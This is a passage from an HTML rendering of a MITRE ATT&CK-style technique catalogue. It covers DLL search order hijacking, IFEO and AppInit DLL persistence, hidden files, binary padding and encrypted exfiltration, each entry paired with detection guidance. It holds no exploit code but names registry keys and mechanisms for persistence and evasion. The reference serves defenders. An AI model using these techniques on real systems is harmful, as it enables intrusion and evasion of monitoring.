<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1008">https://attack.mitre.org/wiki/Technique/T1008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_exploitation_of_vulnerability_t1068">Exploitation of Vulnerability - T1068</a></h3>
<div class="paragraph">
<p>Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions. (Citation: Technet MS14-068) (Citation: ADSecurity Detecting Forged Tickets)</p>
</div>
<div class="paragraph">
<p>Detection: Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Software and operating system crash reports may contain useful contextual information about attempted exploits that correlate with other malicious activity. Exploited processes may exhibit behavior that is unusual for the specific process, such as spawning additional processes or reading and writing to files.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Error Reporting, File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, System access controls</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network. In the case of privilege escalation, the adversary likely already has user permissions on the target system.</p>
</div>
<div class="paragraph">
<p>Contributors: John Lambert, Microsoft Threat Intelligence Center</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 843. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1068">https://attack.mitre.org/wiki/Technique/T1068</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://adsecurity.org/?p=1515">https://adsecurity.org/?p=1515</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/security/ms14-068.aspx">https://technet.microsoft.com/en-us/library/security/ms14-068.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hidden_files_and_directories_t1158"><a class="anchor" href="#_hidden_files_and_directories_t1158"></a><a class="link" href="#_hidden_files_and_directories_t1158">Hidden Files and Directories - T1158</a></h3>
<div class="paragraph">
<p>To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a hidden file. These files dont show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls a&lt;/code&gt; for Linux and macOS).</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Users can mark specific files as hidden by using the attrib.exe binary. Simply do &lt;code&gt;attrib +h filename&lt;/code&gt; to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.</p>
</div>
<div class="paragraph">
<p>===Linux/Mac===</p>
</div>
<div class="paragraph">
<p>Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ., are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: &lt;code&gt;defaults write com.apple.finder AppleShowAllFiles YES&lt;/code&gt;, and then relaunch the Finder Application.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).
Many applications create these hidden files and folders to store information so that it doesnt clutter up the users workspace. For example, SSH utilities create a .ssh folder thats hidden and contains the users known hosts and keys.</p>
</div>
<div class="paragraph">
<p>Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Host forensic analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 844. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1158">https://attack.mitre.org/wiki/Technique/T1158</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/">https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/content/dam/pan/en%20US/assets/pdf/reports/Unit%2042/unit42-wirelurker.pdf">https://www.paloaltonetworks.com/content/dam/pan/en%20US/assets/pdf/reports/Unit%2042/unit42-wirelurker.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_binary_padding_t1009"><a class="anchor" href="#_binary_padding_t1009"></a><a class="link" href="#_binary_padding_t1009">Binary Padding - T1009</a></h3>
<div class="paragraph">
<p>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</p>
</div>
<div class="paragraph">
<p>Detection: Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.</p>
</div>
<div class="paragraph">
<p>When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Signature-based detection</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 845. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1009">https://attack.mitre.org/wiki/Technique/T1009</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redundant_access_t1108"><a class="anchor" href="#_redundant_access_t1108"></a><a class="link" href="#_redundant_access_t1108">Redundant Access - T1108</a></h3>
<div class="paragraph">
<p>Adversaries may use more than one remote access tool with varying command and control protocols as a hedge against detection. If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary&#8217;s tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to Valid Accounts to use External Remote Services such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>Use of a Web Shell is one such way to maintain access to a network through an externally accessible Web server.</p>
</div>
<div class="paragraph">
<p>Detection: Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.</p>
</div>
<div class="paragraph">
<p>Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.</p>
</div>
<div class="paragraph">
<p>If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.</p>
</div>
<div class="paragraph">
<p>For alternative access using externally accessible VPNs or remote services, follow detection recommendations under Valid Accounts and External Remote Services to collect account use information.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process use of network, Packet capture, Network protocol analysis, File monitoring, Binary file metadata, Authentication logs</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Network intrusion detection system</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 846. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1108">https://attack.mitre.org/wiki/Technique/T1108</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_encrypted_t1022"><a class="anchor" href="#_data_encrypted_t1022"></a><a class="link" href="#_data_encrypted_t1022">Data Encrypted - T1022</a></h3>
<div class="paragraph">
<p>Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.</p>
</div>
<div class="paragraph">
<p>Other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol</p>
</div>
<div class="paragraph">
<p>Detection: Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software.</p>
</div>
<div class="paragraph">
<p>A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.</p>
</div>
<div class="paragraph">
<p>Network traffic may also be analyzed for entropy to determine if encrypted data is being transmitted. (Citation: Zhang 2013) If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 847. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1022">https://attack.mitre.org/wiki/Technique/T1022</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.netsec.colostate.edu/" class="bare">http://www.netsec.colostate.edu/</a><sub>zhang/DetectingEncryptedBotnetTraffic.pdf[<a href="http://www.netsec.colostate.edu/" class="bare">http://www.netsec.colostate.edu/</a></sub>zhang/DetectingEncryptedBotnetTraffic.pdf]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/List%20of%20file%20signatures">https://en.wikipedia.org/wiki/List%20of%20file%20signatures</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_plist_modification_t1150"><a class="anchor" href="#_plist_modification_t1150"></a><a class="link" href="#_plist_modification_t1150">Plist Modification - T1150</a></h3>
<div class="paragraph">
<p>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8 encoded and formatted like XML documents via a series of keys surrounded by &lt; &gt;. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as &lt;code&gt;/Library/Preferences&lt;/code&gt; (which execute with elevated privileges) and &lt;code&gt;~/Library/Preferences&lt;/code&gt; (which execute with a user&#8217;s privileges).
Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)</p>
</div>
<div class="paragraph">
<p>Detection: File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.</p>
</div>
<div class="paragraph">
<p>Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Application whitelisting, Process whitelisting, Whitelisting by file name or path</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 848. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1150">https://attack.mitre.org/wiki/Technique/T1150</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dll_search_order_hijacking_t1038"><a class="anchor" href="#_dll_search_order_hijacking_t1038"></a><a class="link" href="#_dll_search_order_hijacking_t1038">DLL Search Order Hijacking - T1038</a></h3>
<div class="paragraph">
<p>Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.</p>
</div>
<div class="paragraph">
<p>Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL.</p>
</div>
<div class="paragraph">
<p>Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)</p>
</div>
<div class="paragraph">
<p>If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.</p>
</div>
<div class="paragraph">
<p>Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, DLL monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Process whitelisting</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Ability to add a DLL, manifest file, or .local file, directory, or junction.</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak, Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 849. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1038">https://attack.mitre.org/wiki/Technique/T1038</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-US/library/ms682586">http://msdn.microsoft.com/en-US/library/ms682586</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.owasp.org/index.php/Binary%20planting">https://www.owasp.org/index.php/Binary%20planting</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/msrc/archive/2010/08/21/microsoft-security-advisory-2269637-released.aspx">http://blogs.technet.com/b/msrc/archive/2010/08/21/microsoft-security-advisory-2269637-released.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-US/library/ms682600">http://msdn.microsoft.com/en-US/library/ms682600</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-US/library/aa375365">https://msdn.microsoft.com/en-US/library/aa375365</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/">https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_image_file_execution_options_injection_t1183"><a class="anchor" href="#_image_file_execution_options_injection_t1183"></a><a class="link" href="#_image_file_execution_options_injection_t1183">Image File Execution Options Injection - T1183</a></h3>
<div class="paragraph">
<p>Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, any executable file present in an applications IFEO will be prepended to the applications name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)</p>
</div>
<div class="paragraph">
<p>IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger Values in the Registry under &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt;&lt;/code&gt; and &lt;code&gt; HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; &lt;/code&gt; where &lt;code&gt;&lt;executable&gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)</p>
</div>
<div class="paragraph">
<p>Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Engame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.</p>
</div>
<div class="paragraph">
<p>Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)</p>
</div>
<div class="paragraph">
<p>Monitor the IFEOs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Engame Process Injection July 2017)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, Windows Registry, Windows event logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 850. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1183">https://attack.mitre.org/wiki/Technique/T1183</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/">https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview">https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/v-descs/backdoor%20w32%20hupigon%20emv.shtml">https://www.f-secure.com/v-descs/backdoor%20w32%20hupigon%20emv.shtml</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security%20response/writeup.jsp?docid=2008-062807-2501-99&amp;tabid=2">https://www.symantec.com/security%20response/writeup.jsp?docid=2008-062807-2501-99&amp;tabid=2</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_from_network_shared_drive_t1039"><a class="anchor" href="#_data_from_network_shared_drive_t1039"></a><a class="link" href="#_data_from_network_shared_drive_t1039">Data from Network Shared Drive - T1039</a></h3>
<div class="paragraph">
<p>Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.</p>
</div>
<div class="paragraph">
<p>Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>System Requirements: Privileges to access network shared drive</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 851. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1039">https://attack.mitre.org/wiki/Technique/T1039</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_appinit_dlls_t1103"><a class="anchor" href="#_appinit_dlls_t1103"></a><a class="link" href="#_appinit_dlls_t1103">AppInit DLLs - T1103</a></h3>
<div class="paragraph">
<p>Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Engame Process Injection July 2017) Similar to Process Injection, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)</p>
</div>
<div class="paragraph">
<p>The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Engame Process Injection July 2017) Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns)</p>
</div>
<div class="paragraph">
<p>Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Loaded DLLs, Process monitoring, Windows Registry</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<div class="paragraph">
<p>System Requirements: Secure boot disabled on systems running Windows 8 and later</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 852. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1103">https://attack.mitre.org/wiki/Technique/T1103</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.microsoft.com/en-us/kb/197571">https://support.microsoft.com/en-us/kb/197571</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/dn280412">https://msdn.microsoft.com/en-us/library/dn280412</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_standard_non_application_layer_protocol_t1095">Standard Non-Application Layer Protocol - T1095</a></h3>
<div class="paragraph">
<p>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), and transport layer protocols, such as the User Datagram Protocol (UDP).</p>
</div>
<div class="paragraph">
<p>ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.</p>
</div>
<div class="paragraph">
